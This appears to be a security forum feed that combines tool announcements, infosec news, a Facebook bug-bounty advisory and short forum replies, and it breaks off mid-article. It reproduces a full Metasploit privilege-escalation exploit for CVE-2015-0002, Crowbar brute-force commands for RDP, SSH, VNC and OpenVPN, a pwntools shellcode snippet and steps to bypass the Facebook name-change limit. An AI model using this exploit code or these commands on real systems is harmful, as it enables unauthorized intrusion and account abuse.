Aerosol

I. Description The OWASP ASVS Assessment Tool (OWAAT) has been developed by Mahmoud Ghorbanzadeh (mdgh (a) aut.ac.ir) at Amirkabir University of Technology's Computer Emergency Response Team (APA). OWAAT is a tool, used to verify Web applications security conformance to the OWASP Application Security Verification Standard (ASVS). OWAAT is a Web-based tool and provides team work capabilities. It allows to create multiple assessment projects and assign assessment tasks to different users. II. Installation Please follow installation wizard: http://YourWebSite/asvs/install/ III. Programs have been used (In alphabetical order) Chosen: Chosen: A jQuery Plugin by Harvest to Tame Unwieldy Select Boxes iCheck: Checkboxes and radio buttons customization (jQuery and Zepto) plugin intro: https://github.com/usablica/intro.js jQuery File Upload: https://github.com/blueimp/jQuery-File-Upload jQuery Notify: http://www.erichynds.com/blog/a-jquery-ui-growl-ubuntu-notification-widget jTable: http://www.jtable.org/ TCPDF: http://www.tcpdf.org/ (Unnecessary program files have been deleted) The OWASP ASVS Report Generator: http://ibuildingsnl.github.io/owasp-asvs-report-generator/index.html Download: https://github.com/ghorbanzadeh/OWAAT

Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way. It includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, and more. Download: https://github.com/google/nogotofail

Faraday introduces a new concept (IPE) Integrated Penetration-Test Environment a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way. Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test. Download: https://github.com/infobyte/faraday

What is it? Crowbar (crowbar) is brute forcing tool that can be used during penetration tests. It is developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example, while most brute forcing tools use username and password for SSH brute force, Crowbar uses SSH key. So SSH keys, that are obtained during penetration tests, can be used to attack other SSH servers. Currently Crowbar supports OpenVPN SSH private key authentication VNC key authentication Remote Desktop Protocol (RDP) with NLA support Installation First you shoud install dependencies # apt-get install openvpn freerdp-x11 vncviewer Then get latest version from github # git clone https://github.com/galkan/crowbar Attention: Rdp depends on your Kali version. It may be xfreerdp for the latest version. Usage -h: Shows help menu. -b: Target service. Crowbar now supports vnckey, openvpn, sshkey, rdp. -s: Target ip address. -S: File name which is stores target ip address. -u: Username. -U: File name which stores username list. -n: Thread count. -l: File name which stores log. Deafault file name is crwobar.log which is located in your current directory -o: Output file name which stores the successfully attempt. -c: Password. -C: File name which stores passwords list. -t: Timeout value. -p: Port number -k: Key file full path. -m: Openvpn configuration file path -d: Run nmap in order to discover whether the target port is open or not. So that you can easily brute to target using crowbar. -v: Verbose mode which is shows all the attempts including fail. If you want see all usage options, please use crowbar --help Brute forcing RDP Below are the examples which you have options for using crowbar. RDP brute force attempt to a single IP address using a single username and a single password: crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 RDP brute force attempt to a single IP address using username list file and a single password crowbar.py -b rdp -s 192.168.2.211/32 -U /root/Desktop/userlist -c passw0rd RDP brute force attempt to a single IP address using a single username and a password list: crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C /root/Desktop/passlist Brute forcing SSH Below are the examples which you have options for using crowbar. SSH key brute force attempt to a single IP address using a single username and a ssh key: crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/id_rsa SSH key brute force attempt to a single IP address using a single username and a ssh key folder: crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/ SSH key brute force attempt to a network using a single username and a ssh key folder in discovery mode: crowbar.py -b sshkey -s 192.168.2.0/24 -u root -k /root/.ssh/ -d Attention: If you want, you can specify the key directory with -k option. Crowbar will use all the files under this directory for brute force. For instance; # crowbar.py -k /root/.ssh Brute forcing VNC server Below is the example which you have options for using crowbar. VNC brute force attempt to a single IP address using a passwd file with specified port number: crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k /root/.vnc/passwd Brute forcing OpenVPN Below are the example which you have options for using crowbar. VPN brute force attempt to a single IP address using a configuration file, a certificate file, a single username and a sindle password with specified port number: crowbar.py -b openvpn -s 198.7.62.204/32 -p 443 -m /root/Desktop/vpnbook.ovpn -k /root/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF Example Output Once you have executed crowbar, it generates 2 files for logging and result that are located in your current directory. Default log file name is crowbar.log which stores all brute force attempts while execution. If you don't want use default log file, you should use -l log_path. The second file is crowbar.out which stores successful attempts while execution. If you don't want use default output file, you should use -o output_path. After that you can observe crowbar operations. Please look at the crowbar.log and crowbar.out files. Download: https://github.com/galkan/crowbar

This is the CTF framework used by Gallopsled in every CTF. from pwn import * context(arch = 'i386', os = 'linux') r = remote('exploitme.example.com', 31337) # EXPLOIT CODE GOES HERE r.send(asm(shellcraft.sh())) r.interactive() However we have made command-line frontends for some of the functionality in pwnlib. These are asm/disasm: Small wrapper for various assemblers. constgrep: Tool for finding constants defined in header files. cyclic: De Bruijn sequence generator and lookup tool. hex/unhex: Command line tools for doing common hexing/unhexing operations. shellcraft: Frontend to our shellcode. phd: Replacement for hexdump with colors. Installation pwntools is best supported on Ubuntu 12.04 and 14.04, but most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.). Most of the functionality of pwntools is self-contained and Python-only. You should be able to get running quickly with pip install pwntools However, some of the features (ROP generation and assembling/disassembling foreign architectures) require non-Python dependencies. For more information, see the complete installation instructions here. Download: https://github.com/Gallopsled/pwntools

Mozilla released the latest version of its flagship browser this week, Firefox 35, fixing nine vulnerabilities, including three critical bugs that could have led to a crash or sandbox bypass, among other issues. One of those critical bugs was a sandbox escape discovered by security researcher Nils. Nils, a researcher at MWR InfoSecurity in the U.K., found a way to break out of the Gecko Media Plugin (GMP) sandbox on Windows systems. If exploited, the hole could have let an attacker bypass the sandbox if it was combined with another GMP bug. The sandbox is apparently only used to host H.264 video playback and the bug would spared OS X and Linux, and only affected Windows systems. The update also remedies a read-after-free bug in WebRTC dug up by researcher Mitchell Harper that stems from the way tracks are handled. This bug could have led to a crash or something the Mozilla Foundation calls incorrect WebRTC behavior. WebRTC is a free API overseen by the World Wide Web Consortium (W3C) that Firefox, along with other browsers like Chrome and Opera, use to help users communicate with other users. The Skype-like feature Firefox Hello that uses WebRTC was first incorporated into Firefox 34 last month. The last critical bug is really a handful of bugs attributed to a collection of Mozilla developers and community members. The issues, mostly memory safety bugs, “showed evidence of memory corruption under circumstances” according to the advisory issued on Tuesday. Researchers added “with enough effort at least some of these could be exploited to run arbitrary code.” Several other bugs, like a memory rendering issue that could lead to leaky web content, and vulnerabilities that could have enabled privilege escalation, were also fixed. As usual Mozilla has posted a brief summary of the security issues in the Advisory section of its site but those seeking a comprehensive list of bugs fixed can find them on Mozilla’s Bugzilla site. Source

A malvertising scheme has hijacked at least two distinct Google AdWords advertising campaigns, redirecting users who had browsed to the sites hosting the poisoned ads without those visitors even clicking on them. Some of the sites in question service more than a million monthly users. Last week, website security firm Sucuri noticed a substantial uptick in requests to scan sites for malware. Oddly enough, the malicious redirects did not discriminate among platforms nor browsers, but some visitors were not redirected while others complained that impacted sites became barely usable. The reason for that has to do with the way online advertising firms use mined data to target ads toward supposedly relevant customers. In extreme cases, advertisers deploy real-time ad-bidding, in which groups compete for seconds or minutes ad space on particular sites at specific times. The infected ads redirected users to convincing-looking but ultimately fraudulent magazine websites with articles containing fake comments and endorsements for health secrets and intelligence boosting tricks. Some of the landing pages masqueraded as real magazines, like Forbes. The redirects occurred even in the Google AdReview center, a sort of administrative panel where site operators can review the advertisements that AdWords intends to post on their site. https://www.youtube.com/watch?v=noTYMDjWbIQ Eventually, the Sucuri researchers managed to isolate the bad ads: Anonymous advertiser adv-2646721236434373 with ads pointing toward adwynn[dot]com and Blackburn ART where ads pointed to rgeoffreyblackburn[dot]com. Each ad firm, the researchers say, seemed legit and must have been hijacked at some point by the people perpetrating the scam. “I don’t know what prevented Google to suspend those accounts right away,” Sucuri wrote. “Maybe their budgets? According to the reports in [a Google production forum], quite a few large sites with millions of monthly page views suffered from those malicious ads. And I suspect those banners may have been displayed more than a million times since December across all the sites with AdSense ads.” Source

Am revenit cu un Update: Suricata IDPE 2.0.6 Changes: Evasion issues fixed. Various bug fixes and improvements. Suricata Stable release is available here. The current version is 2.0.6, released January 15, 2015. Linux/Mac/FreeBSD/UNIX/Windows Source: https://www.openinfosecfoundation.org/download/suricata-2.0.6.tar.gz PGP Signature: https://www.openinfosecfoundation.org/download/suricata-2.0.6.tar.gz.sig Windows (win32) installer: https://redmine.openinfosecfoundation.org/attachments/download/1061/Suricata-2.0.5-1-32bit.msi

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Exploit::EXE include Msf::Post::File include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Microsoft Windows NtApphelpCacheControl Improper Authorization Check', 'Description' => %q{ On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. This module currently only affects Windows 8 and Windows 8.1, and requires access to C:\Windows\System\ComputerDefaults.exe (although this can be improved). }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', 'sinn3r' ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'Arch' => [ARCH_X86, ARCH_X86_64], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows 8 / Windows 8.1 (x86 and x64)', {} ] ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ [ 'CVE', '2015-0002' ], [ 'OSVEB', '116497' ], [ 'EDB', '35661' ], [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118'] ], 'DisclosureDate' => 'Sep 30 2014' })) end def temp @temp ||= get_env('TEMP').to_s end def payload_filepath @payload_filepath ||= "#{temp}\\#{Rex::Text.rand_text_alpha(6)}.dll" end def upload_payload_dll(payload_filepath) payload = generate_payload_dll({:dll_exitprocess => true}) begin write_file(payload_filepath, payload) rescue Rex::Post::Meterpreter::RequestError => e fail_with( Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}" ) end end def upload_payload print_status("Payload DLL will be: #{payload_filepath}") # Upload the payload upload_payload_dll(payload_filepath) if !file?(payload_filepath) fail_with(Failure::Unknown, "Failed to save the payload DLL, or got removed. No idea why.") end end def inject_exploit(process) lib_file_path = ::File.join( Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", 'exploit.dll' ) print_status("Creating thread") exploit_mem, offset = inject_dll_into_process(process, lib_file_path) var_mem = inject_into_process(process, payload_filepath) process.thread.create(exploit_mem + offset, var_mem) end def prep_exploit_host process = nil notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) rescue Rex::Post::Meterpreter::RequestError process = client.sys.process.open rescue ::Exception => e elog("#{e.message}\nCall stack:\n#{e.backtrace.join("\n")}") end process end def check if sysinfo['OS'] =~ /Windows 8/ # Still an 0day, but since this check doesn't actually trigger the vulnerability # so we should only flag this as CheckCode::Appears return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def exploit if session.platform !~ /^x86\// print_error("Sorry, this module currently only allows x86/win32 sessions.") print_error("You will have to get a x86/win32 session first, and then you can") print_error("select a x64 payload as this exploit's payload.") return end print_status("Uploading the payload DLL") upload_payload proc = prep_exploit_host if !proc fail_with(Failure::Unknown, "Fail to get a notepad.exe to run (to host the exploit)") end print_status("Injecting exploit into PID #{proc.pid}") inject_exploit(proc) end end Source

What a strange time. Last week I was literally walking the red carpet at the Hollywood premiere of Michael Mann’s Blackhat, a crime thriller that I had the good fortune to work on as a “hacker adviser” (my actual screen credit). Today, all I’m thinking is, please, God, don’t let anybody in Congress see the film. I’ll explain my anxiety in a minute. First, the movie: Mann, the legendary director of hardboiled crime films like Heat, Collateral, and Miami Vice, always has been a stickler for authenticity, and he brought me into Blackhat as an adviser early on, before it had a title or a lead actor. If you’re wondering how one gets involved in a Michael Mann film, here’s how it works: Mann calls you on the phone. You think, “Why is Michael Mann calling me?” After a phone conversation and an interview in Los Angeles, you’re officially invited on board as a consultant. It turned out Blackhat’s screenwriter had read my cybercrime book Kingpin, and he’d suggested me to Mann. When I showed up for my first consulting meeting, I expected to find a roomful of people crowded around a long conference table. Instead, it was just me and Mann, sitting in his office for five hours at a time. He had questions about malware, hacking, how modern computer intrusions play out. For subsequent meetings, I was given the current iteration of the screenplay (watermarked with my name, lest I leak it to the Pirate Bay), and we went over it line by line, looking at dialogue, discussing tweaks to the hacking and forensics scenes, and working on some of the procedural elements in the plot. Later, Mann brought in a second computer consultant, OkCupid hacker Chris McKinley, to write code for the movie and train leading man Chris Hemsworth in Linux basics, making Hemsworth officially the best-looking human to ever use a command line. The result is in theaters today. I think Blackhat is an awesome movie: stylish, breathtakingly beautiful at times, and close to the metal in depicting a no-longer-scifi world where cybercrime is serious, profitable, and well-funded. I’m biased, of course, because of my involvement, and because I’ve been a fan of Mann’s work since the ’80s. (In one meeting with him I embarrassed myself by recalling the name of the villain in the Miami Vice pilot, which he himself had forgotten.) Overall, the movie seems to be drawing radically polarized reviews, but I’m gratified that security geeks who’ve seen it have given it good grades on authenticity. It wasn’t until this week—Tuesday evening, to be exact—that my anxiety over the timing of the movie set in. That’s when the White House released its legislative proposal to “reform” US computer crime policy in reaction to the Sony breach. President Obama plans to formally announce it at the State of the Union next Tuesday, but the details are public now. And many are troubling. The general thrust of the proposal is to broaden the reach of the Computer Fraud and Abuse Act, and boost penalties for violations. The White House proposal will quadruple the maximum possible sentence for some crimes from five years to 20. And where under current law some hacks are misdemeanors—specifically a first-time offense that doesn’t involve credit cards or more than $5,000 in information—those crimes will now be felonies. Additionally, CFAA violations would qualify for prosecution under the mob-busting RICO statute, meaning, for example, if a member of Anonymous is busted in a petty denial-of-service attack, she might now be held legally accountable for every cybercrime Anonymous has committed. More disturbingly, the proposal includes sweeping language that directly impairs legitimate security work. It makes it newly illegal to “traffic” in any “means of access” into a computer if you have reason to know that someone will use it illegally. Releasing or using hacking code is a staple of cyber security work. Researchers publish it to demonstrate and describe the vulnerabilities they find, and professional white hats use it to audit their customers’ networks. Like many security tools, bad guys can use the software too, and they do. But a sober computer crime proposal doesn’t ban tools that benefit thousands of people because one of them is a criminal. Security expert Robert Graham notes that even circulating a link could be considered a felony under the proposal. Obama has struggled and failed to get similar CFAA changes through Congress in the past, but this time he has the Sony hack behind him—and now Blackhat. If it’s farfetched to think lawmakers will be swayed by a work of Hollywood fiction, consider that it’s happened before. Congress passed the original CFAA in 1984 in direct response to the seminal hacker flick Wargames. Politicians who saw the film felt an urgent need to punish hackers, lest one of them blunder into NORAD and trigger World War III. The result was a law that—after several revisions—led to cases like the Lori Drew and Andrew Auernheimer misfires: People charged for lying in their social networking profiles or conspiring to access an unpublished URL. In one recent case I wrote about, two gamblers were charged under the CFAA for exploiting a bug in video poker machines to beat the house. Following the suicide of hacker activist Aaron Swartz two years ago, a proposal to put limits on the CFAA floated through the halls of Congress and out a window, never to be seen again. Now Obama is looking to go the other way and make the CFAA more powerful. Don’t mistake Obama’s proposal for meaningful action, though. Computer crime sentences have already smashed through the ceiling of efficacy. At this very moment there are hackers, and even low-level credit card fraudsters, serving 20 year terms, and that didn’t deter the Sony intruders. As for the “trafficking” prohibition, when hacking tools are outlawed … well, you know the rest. Nevertheless, I can say with absolute confidence that a lawmaker will soon be standing on the floor of Congress talking about Blackhat in the same breath as the Sony intrusion, railing about the grave threat to American lives that computer hacking poses if the president’s proposal isn’t enacted. I mean, this is a film in which malware makes a Chinese nuclear plant explode in the opening scene. So let me say now to any politicians reading this, as one of the people who helped make Blackhat feel authentic, nuclear plants are not exploding. And if you think they might, then you should direct your efforts to locking down critical systems. Pour money into research, offer incentives for organizations to invest in security, pass disclosure laws that require public reporting of breaches, so consumers can hold negligent companies accountable. Blindly boosting sentences for the few hackers who get caught will do nothing to help. And outlawing security tools just because they can be abused will only aid the real blackhats. Disclosure: As a hacker 20 years ago, the author pleaded guilty under an uncontroversial application of the CFAA. Source

The Twitter accounts of the New York Post and United Press International (UPI) have been hacked with fake tweets on economic and military news. In one post, the Pope was quoted on UPI's Twitter feed as saying that "World War III has begun". Meanwhile, the New York Post's account said that hostilities had broken out between the United States and China. It is the latest hack of a high-profile social media account, four days after US military command was compromised. UPI, which is based in Washington, confirmed in a statement that both its Twitter account and news website had been hacked. Six fake headlines were posted on its Twitter account and a breaking news banner was added to a fake story about the Federal Reserve on its homepage, the statement added. A tweet on the New York Post's account said the USS George Washington, an aircraft carrier, was "engaged in active combat" against Chinese warships in the South China Sea. A Pentagon official said the tweet about hostilities with China was "not true", AFP reports. The tweets have all since been deleted. The New York Post says it is investigating the hack. It comes just days after US President Barack Obama unveiled proposals to strengthen cyber security laws after a spate of attacks on high-profile US targets, including the Pentagon Twitter feed and Sony Pictures. The Twitter account of the US military command was suspended last Monday following an attack by hackers claiming to support Islamic State. In November hackers also released reams of confidential data stolen from Sony Pictures, and in recent years cyber criminals have attacked other US companies such as Home Depot and Target. A number of media organisations, including AFP and the BBC, have also been subjected to cyber attacks over the past two years. Source

Document Title: =============== Facebook Bug Bounty #19 - Filter Bypass Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1381 Facebook Security ID: 221374210 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/01/14/facebook-bug-bounty-restriction-filter-bypass-vulnerability-id-221374210 Release Date: ============= 2015-01-14 Vulnerability Laboratory ID (VL-ID): ==================================== 1381 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== The independent Vulnerability Laboratory Researcher Paulos Yibelo discovered a limitation bypass vulnerability in the official Mobile Site and mobile app (android/ios). Vulnerability Disclosure Timeline: ================================== 2014-12-10: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security) 2014-12-11: Vendor Notification (Facebook Security Team - Bug Bounty Program) 2014-12-15: Vendor Response/Feedback (Facebook Security Team - Bug Bounty Program) 2015-01-12: Vendor Fix/Patch (Facebook Developer Team - Reward: Bug Bounty) 2015-01-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A restriction/limitation bypass web vulnerability has been discovered in the official Facebook Mobile web-application framework. Facebook limits a name change for 60 days before a new name is applied. The advisory explains how i was able to bypass the restriction to change my `Alternative name` using parameter session tampering. First the attacker uses a restricted account (60 day) and review the changes by using a session tamper. By a permanent exchange of the name values the service updates the name value through the mobile service without usage of the secure restriction mechanism. Remote attackers are able to bypass the restriction to exploit the vulnerability. The attack vector of the issue is location on the application-side and the request method to inject is POST. Using this bug, a local attacker (a logged in user) can impersonate other users to manipulate their friends and change back to their account name (bypassing the 60day restriction). The security risk of the filter bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the filter mechanism vulnerability requires a low privileged web-application user account without user interaction. Successful exploitation of the bypass issue results in unauthorized account name changes through alternative name inputs. Request Method(s): [+] POST Vulnerable Service(s): [+] Facebook - Mobile Website [+] Facebook Apps - Apple iOS & Android Vulnerable Module(s): [+] ./settings/account/ Vulnerable Parameter(s): [+] name Proof of Concept (PoC): ======================= The bypass vulnerability can be exploited by remote attackers with a restricted user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Requirements: Attacker needs an account that changed its name and is limited for 60 (x) days before making any other changes Manual steps to reproduce the vulnerability ... 1. Go to https://m.facebook.com/settings/account/?name&refid=70 2. Click review changes and tamper the request, change the value of alternative name to anything 3. Continue the request and save the changed value 4. Submit request, then enter your test account password 5. Name value is changed even if time restriction was set Note: Alternative name shall then be updated too 6. Facebook vulnerability successful exploited! Reference(s): https://m.facebook.com/settings/account/?name&refid=70 Security Risk: ============== The security risk of the restriction/limitation bypass vulnerability in the change name function is estimated as medium. (CVSS 3.5) Credits & Authors: ================== Paulos Yibelo (paulosyibelo.com) Source

Salut sanki si bine ai venit! Cat despre Register Users , Bautor de ceai/bere/vin/palinca/gin/whiskey... sunt rank-uri stabilite dupa numarul de posturi.

Bine ai venit, a da sa nu uit bafta cu facultatea. off:// mi-a placut prezentarea ta.

Felicitari man sa fie cu noroc si sa primesti un "reward" consistent!

The US National Security Agency (NSA) has offered some sort of apology for pushing insecure cryptography solutions to businesses, describing it as a "regrettable" move. Michael Wertheimer, director of research at the NSA, made the admission about the agency's support of the widely criticised Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) in a letter published by the American Mathematical Society (PDF). Dual EC DRBG is a random number generator used by numerous encryption systems that was supported by the NSA throughout the 2000s. The NSA endorsement was a key factor that led the US National Institute of Standards and Technology (NIST) to list the generator as trustworthy. Security firm RSA subsequently integrated Dual EC DRBG into its widely used BSAFE toolkits, despite research from Microsoft and private experts, including cryptography expert Bruce Schneier, suggesting there were backdoors in the system. Reports subsequently broke alleging that the NSA paid RSA $10m to load the tool with the flawed algorithm. RSA has consistently denied this claim. The allegations gained new weight in 2014 when documents leaked by Edward Snowden suggested that ties between the NSA and RSA were deeper than first thought. Addressing these claims, Wertheimer said: "With hindsight, the NSA should have ceased supporting the Dual EC DRBG algorithm immediately after security researchers discovered the potential for a trapdoor. "In truth, I can think of no better way to describe our failure to drop support for the Dual EC DRBG algorithm as anything other than regrettable." He added that the reason for the continued support was a mistaken belief that deploying a new algorithm would be too costly. "The costs to the Defense Department to deploy a new algorithm were not an adequate reason to sustain our support for a questionable algorithm," read the letter. "Indeed, we support NIST's April 2014 decision to remove the algorithm. Furthermore, we realise that our advocacy for the Dual EC DRBG casts suspicion on the broader body of work the NSA has done to promote secure standards." Wertheimer went on to apologise to the maths research community and request that they "continue" to trust the NSA. "NSA mathematicians are fighters in the war on international terrorism, weapons of mass destruction proliferation, narcotics trafficking and piracy," read the report. "It is my sincerest hope that the American Mathematical Society will always see NSA mathematicians as an important part of its membership. "I further hope that dialogue on important issues will always be respectful, informed and focused on inclusivity." The claim has divided the security community, some expressing sympathy towards the NSA and others questioning its cries of innocence. Professor Alan Woodward, of the School of Computer Science at University of Surrey, told V3 that the dangers of pushing a faulty security system far outweigh the benefits for intelligence agencies, such as the NSA. "It is worth remembering that part of the NSA's role is to help secure US government communications as well as gathering foreign intelligence," he said. "It's a bit of a truism but worth repeating: if you deliberately weaken encryption for one set of people whom you consider adversaries, you will weaken it for those you seek to protect as well. "I can imagine that the NSA and every single other signals interception organisation are looking for ways to decrypt internet-based communications. "But I think most realise the dangers of trying to deliberately weaken what is in use. At least I really hope they do." Matthew Green, assistant research professor at the Information Security Institute of Johns Hopkins University, was less positive, pointing out that the NSA still hasn't said why it pushed the standard in the first place, given its technical expertise. "On closer examination, the letter doesn't express regret for the inclusion of Dual EC DRBG in national standards," he noted in a public post. "The transgression Dr Wertheimer identifies is merely that the NSA continued to support the algorithm after major questions were raised. That's bizarre. "It troubles me to see such confusing statements in a publication of the American Mathematical Society. As a record of history, Dr Wertheimer's letter leaves much to be desired, and could easily lead people to the wrong understanding. "Given the stakes, we deserve a more exact accounting of what happened with Dual EC DRBG. I hope someday we'll see that." Wertheimer's comments come during a heated debate about encryption. UK prime minister David Cameron announced plans on 13 January to block encrypted services as a part of a wave of new surveillance laws. Source

oclHashcat+ Advanced GPU Hash Cracking Utility 1.32 Download clHashcat For NVidia 1.32 Download

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide. Changes: Build fixes for the Windows and OpenVMS platforms. Download

Numerous malicious attacks on computers and mobile devices as well as networks of important entities have recently made the news and have brought back to the surface the debate on cyber warfare and the dangerousness of cyber weapons. The increasing dependence on the Internet and the recent spur of attacks are beginning to create greater concern. The fear is not just based on the possibility that a cyber attack could simply cause the non-availability of information and services we are now accustomed to. The Internet has not just reshaped the way we obtain news, communicate with others, take care of our finances, watch TV and listen to music, but it is also permeating other essential fields of our lives. From power smart grids to the “Internet of Things,” the potential targets of cyber warriors are now multiple and the possible consequences catastrophic. Premeditated, politically or socially motivated attacks against a computer-dependent society could be orchestrated by foreign powers and affect nations at any level: from the availability of utilities, to denied access to important financial and medical information, to causing a significant impact on national GDPs. This article will explore the concept of cyber warfare and cyber weapons, plus recount latest happenings and discuss whether the danger is real. Cyber Warfare and Cyber Weapons The definition of cyber warfare and cyber weapons is not as clear-cut as it might seem. Distinguishing these attacks from simple cyber crimes is essential to define rules of engagements by countries and to establish what should be considered a direct act of war against the sovereignty and wellbeing of a state. According to the Tallin Manual on the International Law Applicable to Cyber Warfare – a study commissioned by the NATO Cooperative Cyber Defence Centre of Excellence that is not considered a legally binging document – cyber weapons are cyber means of warfare designed, used or intended to cause either injury or death of people or damage to or destruction of objects. Without a globally recognized definition, however, it is hard to strictly define and recognize true acts of cyber warfare, prevent attacks, hold entities accountable and define legal responses. The inability to agree to basic notions is a considerable weakness in the international arena and leaves space to much uncertainty and endless possibilities for nations beginning to employ these warfare techniques. Several definitions have been given by scholars, but, in general, a cyber weapon is intuitively considered any software, virus, and intrusion device that can disrupt critical infrastructures of other countries, from military defense systems to communications to electric power smart grids to financial systems and air traffic control. Debates have been rising on the possibility to consider cyber weapons tools used not only to directly impair systems but also to spy on nations through cyber espionage. Again, the lack of a globally-recognized legal definition doesn’t help. Have cyber weapons ever been deployed? You may recognize an incident that happened in 2009, the first known use of a cyber weapon: Stuxnet. It was a complex piece of malware believed to be an example of government cyber weapon aimed at severely disrupting the Iranian nuclear program. The paternity of the attack has been a source of debate, but in the end, it was believed to be a joint US/Israel operation. Stuxnet targeted a plant in Natanz, Iran. By turning off valves and impairing centrifuges, equipment was damaged and the Iranian uranium enrichment program effectively slowed down. However, Stuxnet might have not even been the first cyber war tool directed toward Iran. Flame, another powerful malware that masqueraded itself as a routine Microsoft software update, had already been used to map and monitor Iranian networks and collect critical information. Is a Cyber World War a Concern? A 2013 report by Director of National Intelligence James R. Clapper explained that the possibility of a major cyber attack to US critical infrastructures causing a long-term and widespread disruption of services by major players like Russia and China is remote. However, smaller scale attacks by smaller states or non-state entities seem to be a concern. According to the report, “less advanced but highly motivated actors could access some poorly protected US networks that control core functions, such as power generation, during the next two years, although their ability to leverage that access to cause high-impact, systemic disruptions will probably be limited. At the same time, there is a risk that unsophisticated attacks would have significant outcomes due to unexpected system configurations and mistakes, or that vulnerability at one node might spill over and contaminate other parts of a networked system.” This may not come as a surprise to anyone, but any telecommunications infrastructure attack could cause enough harm to generate fear. Every government or corporation entire infrastructure, let alone the public at large, may be at stake. Can digital attacks really have tangible effects? Absolutely. An oil pipeline in Turkey was cyber attacked and exploded in 2008. The pipeline was super-pressurized and alarms were shut off. By hacking security cameras, attackers (allegedly Russian) were able to hide the blast from the control room that, unaware, was unable to respond promptly. Another attack to a German steel company demonstrated how, by simply infiltrating the information systems running the plant, hackers could cause major damage. Although not a single Internet successful attack has been recognized as directed by a foreign terror organization against the United States homeland, there have been instances of intrusions intended to inflict significant harm on the American government or state agency, as well as US businesses. Last November, there was an intrusion into the networks of the Department of the State that led to the unclassified email system shutdown. Carol Morello, the diplomatic correspondent for The Washington Post who covered the affair, noted the activity was related to hacking of White House computers reported a month prior, and to security breaches that occurred at both the U.S. Postal Service and the National Weather Service. Those incidents 